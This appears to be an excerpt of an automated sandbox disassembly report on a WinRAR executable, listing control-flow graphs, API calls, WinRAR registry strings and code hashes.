7ff6256f45f0-7ff6256f4624 call 7ff6256f3884 call 7ff62570eb88 * 2 719->720 721 7ff6256f41db 719->721 755 7ff6256f464a-7ff6256f4691 call 7ff62570ec70 * 2 720->755 756 7ff6256f4626-7ff6256f4648 call 7ff6256f11c0 * 2 720->756 725 7ff6256f41e1-7ff6256f41ee 721->725 727 7ff6256f41f4-7ff6256f41fa 725->727 728 7ff6256f4508-7ff6256f4513 725->728 731 7ff6256f41fc-7ff6256f4202 727->731 732 7ff6256f4208-7ff6256f420e 727->732 728->720 730 7ff6256f4519-7ff6256f4523 728->730 735 7ff6256f4585-7ff6256f4589 730->735 736 7ff6256f4525-7ff6256f452b 730->736 731->728 731->732 737 7ff6256f4214-7ff6256f425c 732->737 738 7ff6256f43d0-7ff6256f43e0 call 7ff6256fa580 732->738 739 7ff6256f45a3-7ff6256f45d4 call 7ff6256f3884 735->739 740 7ff6256f458b-7ff6256f458f 735->740 742 7ff6256f4531-7ff6256f4539 736->742 743 7ff6256f45db-7ff6256f45de 736->743 744 7ff6256f4261-7ff6256f4264 737->744 761 7ff6256f44f0-7ff6256f4503 738->761 762 7ff6256f43e6-7ff6256f4414 call 7ff6256fa9e8 call 7ff62571172c 738->762 739->743 740->739 746 7ff6256f4591-7ff6256f4597 740->746 749 7ff6256f4573-7ff6256f457a 742->749 750 7ff6256f453b-7ff6256f453e 742->750 743->720 751 7ff6256f45e0-7ff6256f45e5 743->751 752 7ff6256f4268-7ff6256f4270 744->752 746->743 754 7ff6256f4599-7ff6256f45a1 746->754 763 7ff6256f457e-7ff6256f4583 749->763 758 7ff6256f4540-7ff6256f4543 750->758 759 7ff6256f456a-7ff6256f4571 750->759 751->725 752->752 760 7ff6256f4272-7ff6256f4288 call 7ff625711700 752->760 754->743 755->652 756->755 765 7ff6256f4545-7ff6256f4548 758->765 766 7ff6256f4561-7ff6256f4568 758->766 759->763 779 7ff6256f42a3 760->779 780 7ff6256f428a-7ff6256f4295 760->780 761->728 762->761 787 7ff6256f441a-7ff6256f44a9 call 7ff6256fd840 call 7ff6256fa900 call 7ff6256fa8c4 call 7ff6256fa900 call 7ff6257115fc 762->787 763->743 771 7ff6256f454a-7ff6256f454d 765->771 772 7ff6256f4558-7ff6256f455f 765->772 766->763 771->746 777 7ff6256f454f-7ff6256f4556 771->777 772->763 777->763 782 7ff6256f42a7-7ff6256f42be 779->782 780->779 785 7ff6256f4297-7ff6256f42a1 780->785 782->744 788 7ff6256f42c0-7ff6256f42c2 782->788 785->782 823 7ff6256f44bf-7ff6256f44cf 787->823 824 7ff6256f44ab-7ff6256f44bb 787->824 790 7ff6256f42c4-7ff6256f42d6 call 7ff6256fa900 788->790 791 7ff6256f42e6 788->791 796 7ff6256f42db-7ff6256f42e1 790->796 791->738 794 7ff6256f42ec 791->794 797 7ff6256f42f1-7ff6256f42f7 794->797 799 7ff6256f45d6 796->799 800 7ff6256f4300-7ff6256f4303 797->800 801 7ff6256f42f9-7ff6256f42fe 797->801 799->743 800->797 801->800 803 7ff6256f4305-7ff6256f4314 801->803 805 7ff6256f433d-7ff6256f4347 803->805 806 7ff6256f4316-7ff6256f4320 803->806 809 7ff6256f434d-7ff6256f4378 call 7ff6256fd840 805->809 810 7ff6256f45ea-7ff6256f45ef call 7ff62570a774 805->810 808 7ff6256f4323-7ff6256f4327 806->808 808->805 814 7ff6256f4329-7ff6256f433b 808->814 818 7ff6256f439e-7ff6256f43cb call 7ff6256f470c 809->818 819 7ff6256f437a-7ff6256f4399 call 7ff625711764 809->819 810->720 814->805 814->808 818->796 819->796 827 7ff6256f44d2-7ff6256f44d8 823->827 824->823 828 7ff6256f44da-7ff6256f44e5 827->828 829 7ff6256f44eb-7ff6256f44ee 827->829 828->799 828->829 829->827
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                              • API String ID: 602362809-1645646101
                                                                                                                                                                                                                              • Opcode ID: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
                                                                                                                                                                                                                              • Instruction ID: bff2ead58c9210d3512f851ce86d21b04bc14238d0c2eead534d93aaccd8a11c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86228F22E1968285EE30DF15D8506B92361FF44B84F805136EE4EC7EA9EF6DED44D302

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1405 7ff6256c4fd0-7ff6256c502d call 7ff62570a5a0 1408 7ff6256c502f-7ff6256c5037 1405->1408 1409 7ff6256c504d-7ff6256c5055 1405->1409 1408->1409 1412 7ff6256c5039-7ff6256c504b call 7ff62570c8a0 1408->1412 1410 7ff6256c506e-7ff6256c5089 call 7ff6256e420c 1409->1410 1411 7ff6256c5057-7ff6256c5069 call 7ff6256c481c 1409->1411 1418 7ff6256c509f-7ff6256c50b6 call 7ff6256fdb08 1410->1418 1419 7ff6256c508b-7ff6256c509d call 7ff6256fa9c0 1410->1419 1411->1410 1412->1409 1412->1411 1424 7ff6256c511b-7ff6256c5131 call 7ff62570c8a0 1418->1424 1425 7ff6256c50b8-7ff6256c50c3 call 7ff6256fa59c 1418->1425 1419->1424 1431 7ff6256c5203-7ff6256c520d call 7ff6256faa48 1424->1431 1432 7ff6256c5137-7ff6256c513e 1424->1432 1425->1424 1430 7ff6256c50c5-7ff6256c50cf call 7ff6256d3054 1425->1430 1430->1424 1441 7ff6256c50d1-7ff6256c5107 call 7ff6256fa9e8 call 7ff6256fa9c0 call 7ff6256d3054 1430->1441 1440 7ff6256c5212-7ff6256c521c 1431->1440 1433 7ff6256c5140-7ff6256c5167 call 7ff6256e3f98 1432->1433 1434 7ff6256c516c-7ff6256c51be call 7ff6256faa1c call 7ff6256faa48 call 7ff6256f6e98 1432->1434 1433->1434 1494 7ff6256c51d3-7ff6256c51e8 call 7ff6256f7a24 1434->1494 1443 7ff6256c5222 1440->1443 1444 7ff6256c52db-7ff6256c52e0 1440->1444 1441->1424 1520 7ff6256c5109-7ff6256c5116 call 7ff6256fa9e8 1441->1520 1449 7ff6256c532f-7ff6256c5332 1443->1449 1450 7ff6256c5228-7ff6256c522d 1443->1450 1445 7ff6256c5453-7ff6256c5477 call 7ff6256cf00c call 7ff6256cf230 call 7ff6256cf09c 1444->1445 1446 7ff6256c52e6-7ff6256c52e9 1444->1446 1514 7ff6256c547c-7ff6256c5483 1445->1514 1453 7ff6256c52ef-7ff6256c52f2 1446->1453 1454 7ff6256c5379-7ff6256c5382 1446->1454 1451 7ff6256c5334 1449->1451 1452 7ff6256c533b-7ff6256c533e 1449->1452 1450->1449 1457 7ff6256c5233-7ff6256c5236 1450->1457 1451->1452 1462 7ff6256c5340 1452->1462 1463 7ff6256c5347-7ff6256c5358 call 7ff6256b1230 call 7ff6256b4858 1452->1463 1464 7ff6256c52f4-7ff6256c52f7 1453->1464 1465 7ff6256c536c-7ff6256c5374 call 7ff6256f81cc 1453->1465 1459 7ff6256c5449-7ff6256c5451 call 7ff6256eeab8 1454->1459 1460 7ff6256c5388-7ff6256c538b 1454->1460 1468 7ff6256c5290-7ff6256c5299 1457->1468 1469 7ff6256c5238-7ff6256c523b 1457->1469 1459->1514 1470 7ff6256c5391-7ff6256c5397 1460->1470 1471 7ff6256c541b-7ff6256c5433 call 7ff6256fab1c 1460->1471 1462->1463 1528 7ff6256c535d 1463->1528 1464->1445 1474 7ff6256c52fd-7ff6256c5300 1464->1474 1465->1514 1476 7ff6256c52b2-7ff6256c52bd 1468->1476 1477 7ff6256c529b-7ff6256c529e 1468->1477 1479 7ff6256c5274-7ff6256c528b call 7ff6256b1230 call 7ff6256b48ec 1469->1479 1480 7ff6256c523d-7ff6256c5240 1469->1480 1483 7ff6256c5399-7ff6256c539c 1470->1483 1484 7ff6256c540c-7ff6256c5419 call 7ff6256e54f8 call 7ff6256e51e4 1470->1484 1471->1514 1527 7ff6256c5435-7ff6256c5447 call 7ff6256ebbd4 1471->1527 1474->1449 1486 7ff6256c5302-7ff6256c5305 1474->1486 1493 7ff6256c52ce-7ff6256c52d6 call 7ff6256e55e0 1476->1493 1495 7ff6256c52bf-7ff6256c52c9 call 7ff6256fa9e8 1476->1495 1492 7ff6256c52a0-7ff6256c52a6 1477->1492 1477->1493 1543 7ff6256c535e-7ff6256c5362 call 7ff6256b14fc 1479->1543 1480->1445 1488 7ff6256c5246-7ff6256c5249 1480->1488 1499 7ff6256c53ef-7ff6256c5401 call 7ff6256c45c8 1483->1499 1500 7ff6256c539e-7ff6256c53a1 1483->1500 1484->1514 1502 7ff6256c5322-7ff6256c532a call 7ff6256d67e0 1486->1502 1503 7ff6256c5307-7ff6256c530a 1486->1503 1488->1449 1505 7ff6256c524f-7ff6256c5252 1488->1505 1510 7ff6256c5313-7ff6256c531d call 7ff6256c481c 1492->1510 1511 7ff6256c52a8-7ff6256c52ad call 7ff6256c7214 1492->1511 1493->1514 1545 7ff6256c51c0-7ff6256c51ce call 7ff6256faa48 1494->1545 1546 7ff6256c51ea-7ff6256c5201 call 7ff6256f6f68 call 7ff6256b14c0 1494->1546 1495->1493 1499->1484 1500->1510 1516 7ff6256c53a7-7ff6256c53d5 call 7ff6256c45c8 call 7ff6256fab1c 1500->1516 1502->1514 1503->1445 1519 7ff6256c5310 1503->1519 1505->1445 1523 7ff6256c5258-7ff6256c525b 1505->1523 1510->1514 1511->1514 1517 7ff6256c5491-7ff6256c54bc call 7ff62570a610 1514->1517 1518 7ff6256c5485-7ff6256c548c call 7ff6256c8444 1514->1518 1516->1514 1561 7ff6256c53db-7ff6256c53ea call 7ff6256eba9c 1516->1561 1518->1517 1519->1510 1520->1424 1537 7ff6256c525d-7ff6256c5260 1523->1537 1538 7ff6256c526b-7ff6256c5272 1523->1538 1527->1514 1528->1543 1537->1502 1549 7ff6256c5266 1537->1549 1538->1493 1557 7ff6256c5367 1543->1557 1545->1494 1546->1440 1549->1519 1557->1514 1561->1514
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                              • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                              • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                              • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                              • Instruction ID: 82075ec9830415acb0f969a3d0265b70bf024e7f3c6dc55f69f0170f91b7be51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDC18461A1858254EE34AF259C591FC2291FF66F86F444131E94ECA5FADF2DEE00E313

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1564 7ff6256f7f24-7ff6256f7f5c 1565 7ff6256f7fd0 1564->1565 1566 7ff6256f7f5e-7ff6256f7f64 1564->1566 1567 7ff6256f7fd7-7ff6256f7fea 1565->1567 1566->1565 1568 7ff6256f7f66-7ff6256f7f7c call 7ff6256fb3f0 1566->1568 1569 7ff6256f7fec-7ff6256f7fef 1567->1569 1570 7ff6256f8036-7ff6256f8039 1567->1570 1576 7ff6256f7fb5 1568->1576 1577 7ff6256f7f7e-7ff6256f7fb3 GetProcAddressForCaller GetProcAddress 1568->1577 1573 7ff6256f805c-7ff6256f8065 GetCurrentProcessId 1569->1573 1575 7ff6256f7ff1-7ff6256f8000 1569->1575 1570->1573 1574 7ff6256f803b-7ff6256f804a 1570->1574 1578 7ff6256f8077-7ff6256f8093 1573->1578 1579 7ff6256f8067 1573->1579 1584 7ff6256f804f-7ff6256f8051 1574->1584 1585 7ff6256f8005-7ff6256f8007 1575->1585 1580 7ff6256f7fbc-7ff6256f7fce 1576->1580 1577->1580 1583 7ff6256f8069-7ff6256f8075 1579->1583 1580->1567 1583->1578 1583->1583 1584->1578 1586 7ff6256f8053-7ff6256f805a 1584->1586 1585->1578 1587 7ff6256f8009 1585->1587 1588 7ff6256f8010-7ff6256f8034 call 7ff6256cca6c call 7ff6256ccda4 call 7ff6256cca40 1586->1588 1587->1588 1588->1578
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                              • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                              • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                              • Instruction ID: e3d4a1e09534e24e030e2c2df9d04645cbdd2bea55e4f4f1492f9ec4aab6e374
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B415621E49A8291EE25CF16AC0053967A1BF49FE5F580135CC6EC7BA4DE3CEC429302

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 552178382-0
                                                                                                                                                                                                                              • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                              • Instruction ID: a93104288e51691ed501797b324fecf8101605e357fe7f9a2d555ec997f1f599
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C313D21E8824385FE34AF26AC617BD13D2AF55F84F444036EA4DC76D7EE2EED048652

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6256F495D,?,?,?,00007FF6256E7E7D), ref: 00007FF6256F47DB
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6256F495D,?,?,?,00007FF6256E7E7D), ref: 00007FF6256F4831
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6256F495D,?,?,?,00007FF6256E7E7D), ref: 00007FF6256F4853
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6256F495D,?,?,?,00007FF6256E7E7D), ref: 00007FF6256F48A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                              • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                              • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                              • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                              • Instruction ID: 8aa0517a99ffd07d0d627ce4fb78cb8ae7bb649de8329dafec2010cb483f5f9d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75318022B28A8145EE709F21EC406BA6351FF84B94F405231EE4E87FA9EE6CD944C701

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E43D1
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E4402
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E440D
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E443E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                              • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                              • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                              • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                              • Instruction ID: 42dc30db8455db211e47453d275f8ee05b3cbc68b99d0242f3b81d5b94a47809
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3115122A1974185EE319F26AC009B9B360FF88FC5F445131EA4E87A69EF3CD804D702

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
